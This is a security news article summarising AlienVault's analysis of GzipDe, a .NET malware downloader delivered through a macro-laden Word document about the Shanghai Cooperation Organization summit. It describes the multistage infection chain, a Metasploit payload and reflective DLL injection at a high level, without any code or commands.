A new piece of, what appears to be, highly targeted malware has been discovered by researchers at AlienVault. The new malware strain, dubbed GzipDe and most likely used in cyber-espionage campaigns, uses an article about the next Shanghai Cooperation Organization Summit.
More about the GzipDe Malware Operation
About a week ago, researchers detected a new malicious document targeting this area. Apparently, the document has included a piece of text taken from the report as a decoy.
AlienVault discovered a booby-trapped Word document on VirusTotal which was published by a user from Afghanistan. This is how they unearthed the malware.
The above-mentioned booby-trapped document (.doc file) is the first step of a multistage infection in which several servers and artifacts are deployed. The final stage of the malicious operation appears to be the installation of a Metasploit backdoor. However, this is not as interesting as the .NET downloader, which uses a custom encryption method to obfuscate process memory and evade antivirus detection.
The malicious document tricked users into enabling macros, which once enabled executed a Visual Basic script. Then the script ran some PowerShell code, which subsequently downloaded a PE32 executable. The process ended with the actual malware — GZipDe – the researchers reported.
GZipDe appears to be coded in .NET, and it is designed to use “a custom encryption method to obfuscate process memory and evade antivirus detection.” Since the initial purpose of GzipDe is to act as a downloader, it means that the malware will download a more dangerous piece from a remote server. However, during the researchers’ investigation, the remote server was over which usually would end the analysis. However, it turned out Shodan, the IoT search engine, indexed the server and even recorded it serving a Metasploit payload.
The server, 175.194.42[.]8, delivers a Metasploit payload. It contains shellcode to bypass system detection (since it looks to have a valid DOS header) and a Meterpreter payload – a capable backdoor. For example, it can gather information from the system and contact the command and control server to receive further commands.
In addition, the shellcode loads the entire DLL into memory, thus enabling it to operate while no information is written into the disk. This operation is known as Reflective DLL injection. From this point, the attacker can transmit any other payload in order to acquire elevated privileges and move within the local network, the researchers concluded.